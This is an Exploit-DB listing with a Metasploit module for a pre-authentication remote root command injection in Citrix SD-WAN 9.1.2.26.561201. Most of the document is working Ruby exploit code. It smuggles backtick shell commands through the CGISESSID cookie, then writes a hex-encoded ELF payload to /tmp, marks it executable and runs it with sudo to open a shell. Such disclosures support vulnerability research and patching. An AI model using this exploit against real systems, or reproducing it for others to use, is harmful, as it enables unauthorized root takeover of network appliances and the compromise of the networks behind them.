Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)

EDB-ID:

42345

Author:

xort

Type:

webapps

Platform:

CGI

Published:

2017-07-19

# Exploit Title: Citix SD-WAN logout cookie preauth Remote Command Injection Vulnerablity 
# Date: 02/20/2017
# Exploit Author: xort @ Critical Start
# Vendor Homepage: www.citrix.com
# Software Link: https://www.citrix.com/downloads/cloudbridge/
# Version: 9.1.2.26.561201
# Tested on: 9.1.2.26.561201 (OS partition 4.6)
#            
# CVE : (awaiting cve)

# vuln: CGISESSID Cookie parameter
#  associated vuln urls:
#                       /global_data/ 
#			/global_data/headerdata 
#			/log
#			/
#			/r9-1-2-26-561201/configuration/ 
#			/r9-1-2-26-561201/configuration/edit 
#			/r9-1-2-26-561201/configuration/www.citrix.com [CGISESSID cookie]
#
# Description PreAuth Remote Root Citrix SD-WAN <= v9.1.2.26.561201. This exploit leverages a command injection bug. 
#
# xort @ Critical Start

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = ExcellentRanking
	include  Exploit::Remote::Tcp
        include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Citrix SD-WAN CGISESSID Cookie Remote Root',
					'Description'    => %q{
					This module exploits a remote command execution vulnerability in the Citrix SD-WAN Appliace Version <=  v9.1.2.26.561201. The vulnerability exist in a section of the machine's session checking functionality. If the CGISESSID cookie holds shell-command data - it is used in a call to system where input is processed unsanitized.
			},
			'Author'         =>
				[
					'xort@Critical Start', # vuln + metasploit module
				],
			'Version'        => '$Revision: 1 $',
			'References'     =>
				[
					[ 'none', 'none'],
				],
			'Platform'      => [ 'linux'],
			'Privileged'     => true,
			 'Arch'          => [ ARCH_X86 ],
                        'SessionTypes'  => [ 'shell' ],
		        'Payload'        =>
                                { 
                                  'Compat' =>
                                  {
                                        'ConnectionType' => 'find',
                                  }
                                },

			'Targets'        =>
				[
					['Linux Universal',
						{
								'Arch' => ARCH_X86,
								'Platform' => 'linux'
						}
					],
				],
			'DefaultTarget' => 0))

			register_options(
				[
					OptString.new('CMD', [ false, 'Command to execute', "" ]),	
					Opt::RPORT(443),
				], self.class)
	end

	def run_command(cmd)

		vprint_status( "Running Command...\n" )

		# send request with payload	
		res = send_request_cgi({
			'method' => 'POST',
                        'uri'     => "/global_data/",
			'vars_post' => {
				'action' => 'logout'
			},
 	                'headers' => {
                        	'Connection' => 'close',
                        	'Cookie' => 'CGISESSID=e6f1106605b5e8bee6114a3b5a88c5b4`'+cmd+'`; APNConfigEditorSession=0qnfarge1v62simtqeb300lkc7;',
                        }

		})


		# pause to let things run smoothly
		sleep(2)


	end

	
	def exploit
		# timeout
		timeout = 1550;

		# pause to let things run smoothly
		sleep(2)

		 #if no 'CMD' string - add code for root shell
                if not datastore['CMD'].nil? and not datastore['CMD'].empty?

                        cmd = datastore['CMD']

                        # Encode cmd payload

                        encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\x\1\2')

			# upload elf to /tmp/n , chmod +rx /tmp/n , then run /tmp/n (payload)
                        run_command("echo -e #{encoded_cmd}>/tmp/n")
                        run_command("chmod 755 /tmp/n")
                        run_command("sudo /tmp/n")
                else
                        # Encode payload to ELF file for deployment
                        elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
                        encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\x\1\2')

			# upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload)
                        run_command("echo -e #{encoded_elf}>/tmp/m")
                        run_command("chmod 755 /tmp/m")
                        run_command("sudo /tmp/m")

			# wait for magic
                        handler
			
                end


	end
end